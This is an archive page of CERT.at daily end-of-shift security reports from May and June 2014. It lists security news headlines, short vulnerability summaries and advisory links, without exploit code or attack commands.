https://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-… *** Vulnerabilities in All in One SEO Pack Wordpress Plugin Put Millions of Sites At Risk *** --------------------------------------------- Multiple Serious vulnerabilities have been discovered in the most famous "All In One SEO Pack" plugin for WordPress, that put millions of Wordpress websites at risk. --------------------------------------------- https://thehackernews.com/2014/05/vulnerabilities-in-all-in-one-seo-pack.ht… *** (0Day) Rocket Servergraph Admin Center for TSM userRequest save_server_groups Command Remote Code Execution Vulnerability *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Rocket Servergraph Admin Center for Tivoli Storage Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the userRequest servlet. It is possible to inject arbitrary operating system commands when the servlet .. --------------------------------------------- http://zerodayinitiative.com/advisories/ZDI-14-166/ *** Using nmap to scan for DDOS reflectors *** --------------------------------------------- As we have seen in past diaries about reflective DDOS attacks they are certainly the flavor of the day. US-CERT claims there are several UDP based protocols that are potential attack vectors. In my experience the most prevalent ones are DNS, NTP, SNMP, and CharGEN. Assuming you have permission; Is there an easy way to do good data gathering for these ports on your network? Yes, as a matter of a fact it can be done in one simple nmap command. --------------------------------------------- https://isc.sans.edu/diary/Using+nmap+to+scan+for+DDOS+reflectors/18193 *** dbus-glib pam_fprintd Local Root Exploit *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2014060009 *** DCMTK Privilege Escalation *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2014060011

1 0

Tageszusammenfassung - Montag 2-06-2014
by Daily end-of-shift report 02 Jun '14

02 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 30-05-2014 18:00 − Montag 02-06-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Play Store ermöglicht Apps mehr Rechte ohne Nachfragen *** --------------------------------------------- Der Play Store wird mal wieder renoviert, doch dabei sägt Google auch an tragenden Wänden. In der aktuellen Version werden App-Berechtigungen in Gruppen zusammengefasst, weshalb neue Rechte nicht immer genehmigt werden müssen. --------------------------------------------- http://www.heise.de/security/meldung/Play-Store-ermoeglicht-Apps-mehr-Recht… *** CVE-2014-2120 - A Tale of Cisco ASA 'Zero-Day' *** --------------------------------------------- A few months ago I was trying to PoC a known cross-site scripting vulnerability in the Cisco ASA WebVPN portal (CVE-2013-3414) for inclusion in the TrustKeeper Scan Engine. I tried a number of different techniques on multiple different ASA versions/branches and I simply could not tease out a viable PoC. At my wits end, I .. --------------------------------------------- http://blog.spiderlabs.com/2014/05/cve-2014-2120-a-tale-of-cisco-asa-0-day.… *** FTP Zugangsdaten kompromittiert *** --------------------------------------------- Wie Heise berichtet, hat das BSI/CERT-Bund viele Provider informiert, dass Zugangsdaten zu FTP-Accounts gefunden wurden.Das betraf nicht nur Deutschland; die gleiche Quelle hat auch andere CERTs und Sicherheitsteams informiert. Wir bekamen die gleichen Daten wie unsere deutschen Kollegen, .. --------------------------------------------- http://www.cert.at/services/blog/20140530100952-1151.html *** WordPress iMember360is 3.9.001 XSS Disclosure Code Execution *** --------------------------------------------- WordPress iMember360is 3.9.001 XSS Disclosure Code Execution --------------------------------------------- http://cxsecurity.com/issue/WLB-2014060001 *** Security: Heartbleed in WLAN-Routern gefunden *** --------------------------------------------- Der Heartbleed-Fehler ist offenbar noch in zahlreichen WLAN-Routern vorhanden, genauer im Authentifizierungsprotokoll EAP. Das berichtet der Sicherheitsexperte Luis Grangeia. --------------------------------------------- http://www.golem.de/news/security-heartbleed-in-wlan-routern-gefunden-1406-… *** CVE-2014-3466 gnutls: insufficient session id length check in _gnutls_read_server_hello (GNUTLS-SA-2014-3) *** --------------------------------------------- A flaw was found in the way GnuTLS parsed session ids from Server Hello packets of the TLS/SSL handshake. A malicious server could use this flaw to send an excessively long session id value and trigger a buffer overflow in a connecting TLS/SSL client using GnuTLS, causing it to crash or, possibly, execute arbitrary code. --------------------------------------------- https://bugzilla.redhat.com/show_bug.cgi?id=1101932 *** DSA-2943-1 php5 -- security update *** --------------------------------------------- Several vulnerabilities were found in PHP, a general-purpose scripting language commonly used for web application development .. --------------------------------------------- https://www.debian.org/security/2014/dsa-2943 *** Huawei: SMS verschicken auf fremde Kosten *** --------------------------------------------- Eine Sicherheitslücke in einem weit verbreiteten USB-UMTS-Stick ermöglicht es Angreifern, mit einer manipulierten Webseite SMS zu verschicken. Ein Update gibt es bisher nicht. (UMTS, Technologie) --------------------------------------------- http://www.golem.de/news/huawei-sms-verschicken-auf-fremde-kosten-1406-1068… *** 'Operation Tovar' Targets 'Gameover' ZeuS Botnet, CryptoLocker Scourge *** --------------------------------------------- The U.S. Justice Department is expected to announce today an international law enforcement operation to seize control over the Gameover ZeuS botnet, a sprawling network of hacked Microsoft Windows computers that currently infects an estimated 500,000 to 1 million compromised systems globally. Experts say PCs infected with Gameover are being harvested for sensitive financial and personal data, .. --------------------------------------------- http://krebsonsecurity.com/2014/06/operation-tovar-targets-gameover-zeus-bo…

1 0

Tageszusammenfassung - Freitag 30-05-2014
by Daily end-of-shift report 30 May '14

30 May '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 29-05-2014 18:00 − Freitag 30-05-2014 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** Third-Party Auth Token Theft: The Big Picture *** --------------------------------------------- Nothing sets the technical journalists abuzz like the prospect of a catastrophic, Internet-wide vulnerability. Fresh off the very legitimate excitement over Heartbleed, some media outlets were hoping for a new scoop with "Covert Redirections". Spoiler alert: there's no catastrophe. For those that haven't heard, this started with a paper and series of blog posts by Wang Jing. Wang describes an attack against websites that use third-party authentication services and are... --------------------------------------------- http://blog.spiderlabs.com/2014/05/third-party_auth_token_theft_the_big_pic… *** Ende von Truecrypt: Entwickler hat angeblich Interesse verloren *** --------------------------------------------- Einer der Entwickler von Truecrypt hat sich angeblich zu Wort gemeldet und die Beweggründe für das plötzliche Aus erklärt: Man habe das Interesse verloren. Einer Weiterentwicklung durch die Community steht er demnach kritisch gegenüber. --------------------------------------------- http://www.heise.de/security/meldung/Ende-von-Truecrypt-Entwickler-hat-ange… *** Hintergrund: Truecrypt ist unsicher - und jetzt? *** --------------------------------------------- Sollten wir jetzt wirklich alle auf Bitlocker umsteigen, wie es die Truecrypt-Entwickler vorschlagen? Einen echten Nachfolger wird es jedenfalls so bald nicht geben - und daran sind nicht zu letzt auch die Truecrypt-Entwickler schuld. --------------------------------------------- http://www.heise.de/security/artikel/Truecrypt-ist-unsicher-und-jetzt-22114… *** ThreadFix v2.1M1 Released *** --------------------------------------------- ThreadFix is a software vulnerability aggregation and management system that reduces the time it takes to fix software vulnerabilities. ThreadFix imports the results from dynamic, static and manual testing to provide a centralized view of software security defects across development teams and applications. ThreadFix is licensed under the Mozilla Public License (MPL) version 2.0. --------------------------------------------- http://www.toolswatch.org/2014/05/threadfix-v2-1m1-released/ *** New Attack Methods Can brick Systems, Defeat Secure Boot, Researchers Say *** --------------------------------------------- IDG News Service - The Secure Boot security mechanism of the Unified Extensible Firmware Interface (UEFI) can be bypassed on around half of computers that have the feature enabled in order to install bootkits, according to a security researcher. --------------------------------------------- http://www.cio.com/article/753439/New_Attack_Methods_Can_39_brick_39_System… *** Thieves Planted Malware to Hack ATMs *** --------------------------------------------- A recent ATM skimming attack in which thieves used a specialized device to physically insert malicious software into a cash machine may be a harbinger of more sophisticated scams to come. --------------------------------------------- http://krebsonsecurity.com/2014/05/thieves-planted-malware-to-hack-atms/ *** Heartbleed-Bug: OpenSSL bekommt Security-Audit und zwei Festangestellte *** --------------------------------------------- Die Linux-Foundation sammelt Geld für Kern-Infrastruktur wie OpenSSL und gibt nun erste Pläne bekannt. Beraten sollen das Projekt Linux-Kernel-Hacker und Bruce Schneier sowie Eben Moglen. --------------------------------------------- http://www.golem.de/news/heartbleed-bug-openssl-bekommt-security-audit-und-… *** When Networks Turn Hostile *** --------------------------------------------- We've previously discussed how difficult it is to safely connect to networks when on the go. This is particularly true on vacations and holidays, where the availability of Internet access is one of the most important factors when looking for a place to stay. In fact, many holiday lodges and hotels today have made Wi-Fi access an... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/CL6K-SnbQJQ/ *** Triangle MicroWorks Uncontrolled Resource Consumption *** --------------------------------------------- Adam Crain of Automatak and Chris Sistrunk of Mandiant have identified an uncontrolled resource consumption vulnerability in Triangle MicroWorks products and third-party components. Triangle MicroWorks has produced an update that mitigates this vulnerability. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-149-01 *** Cogent Datahub Vulnerabilities *** --------------------------------------------- Independent researcher Alain Homewood has identified four vulnerabilities in the Cogent Real-Time Systems DataHub application. Cogent Real-Time Systems has produced a new version that mitigates three of the four identified vulnerabilities; they have recommended a mitigation for the unresolved vulnerability. The researcher has tested the new version to validate that it resolves three of the four vulnerabilities. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-149-02 *** VMSA-2014-0005 *** --------------------------------------------- VMware Workstation, Player, Fusion, and ESXi patches address a guest privilege escalation --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2014-0005.html *** VMSA-2014-0002.3 *** --------------------------------------------- VMware vSphere updates to third party libraries --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2014-0002.html *** ElasticSearch Dynamic Script Arbitrary Java Execution *** --------------------------------------------- Topic: ElasticSearch Dynamic Script Arbitrary Java Execution Risk: High Text:## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-fr... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014050154 *** VU#325636: Huawei E303 contains a cross-site request forgery vulnerability *** --------------------------------------------- Vulnerability Note VU#325636 Huawei E303 contains a cross-site request forgery vulnerability Original Release date: 30 May 2014 | Last revised: 30 May 2014 Overview The built-in web interface of Huawei E303 devices contains a cross-site request forgery vulnerability. Description Huawei E303 wireless broadband modems include a web interface for administration and additional services. The web interface allows users to send and receive SMS messages using the connected cellular network. CWE-352: --------------------------------------------- http://www.kb.cert.org/vuls/id/325636 *** VU#124908: Dell ML6000 and Quantum Scalar i500 tape backup system command injection vulnerability *** --------------------------------------------- Vulnerability Note VU#124908 Dell ML6000 and Quantum Scalar i500 tape backup system command injection vulnerability Original Release date: 30 May 2014 | Last revised: 30 May 2014 Overview Dell ML6000 and Quantum Scalar i500 tape backup system contain a command injection vulnerability. Description CWE-78: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection)Dells and Quantums advisories state the following:The tape librarys remote user interface... --------------------------------------------- http://www.kb.cert.org/vuls/id/124908

1 0

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

Daily